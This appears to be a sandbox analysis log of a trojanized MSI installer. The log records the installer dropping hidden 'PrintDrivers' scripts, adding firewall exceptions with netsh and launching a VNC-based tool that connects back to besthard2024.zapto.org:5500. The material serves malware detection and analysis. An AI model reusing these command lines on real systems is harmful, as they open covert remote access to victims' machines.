                  Source: PrintDriver.exe.1.drStatic PE information: Resource name: JAVAARCHIVE type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: rs8dpaIe6D.msi | Binary or memory string: OriginalFilenameviewer.exeF vs rs8dpaIe6D.msi
Source: rs8dpaIe6D.msi | Binary or memory string: OriginalFilenameAICustAct.dllF vs rs8dpaIe6D.msi
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: classification engine | Classification label: mal100.troj.evad.winMSI@78/47@1/2
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_004262B0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,3_2_004262B0
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_00426FE0 CoInitialize,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,3_2_00426FE0
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_00421D80 LoadResource,LockResource,SizeofResource,3_2_00421D80
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\CML416B.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Games\PrintDriver.exe | Mutant created: \Sessions\1\BaseNamedObjects\WinVNC_Win32_Instance_Mutex
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFAE3E9B168B65793C.TMP
Source: C:\Games\PrintDrivers.exe | Command line argument: A\4_2_005C4140
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="PrintDriver.exe")
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE (name="PrintDriver.exe")
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Windows\SysWOW64\timeout.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "rundll32.exe")
Source: C:\Games\PrintDrivers.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: rs8dpaIe6D.msi | Virustotal: Detection: 14%
Source: rs8dpaIe6D.msi | ReversingLabs: Detection: 26%
Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\rs8dpaIe6D.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI4384.tmp "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
Source: unknown | Process created: C:\Games\PrintDrivers.exe "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
Source: C:\Games\PrintDrivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Games\PrintDriver.exe C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Games\PrintDrivers.exe C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
Source: C:\Games\PrintDrivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 09F4460A034BA1C42EB6AA8B09573B17
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI4384.tmp "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
Source: C:\Games\PrintDrivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Games\PrintDrivers.exe C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Games\PrintDriver.exe C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run
Source: C:\Games\PrintDrivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: webio.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.ui.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: inputhost.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Games\PrintDrivers.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: twinui.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
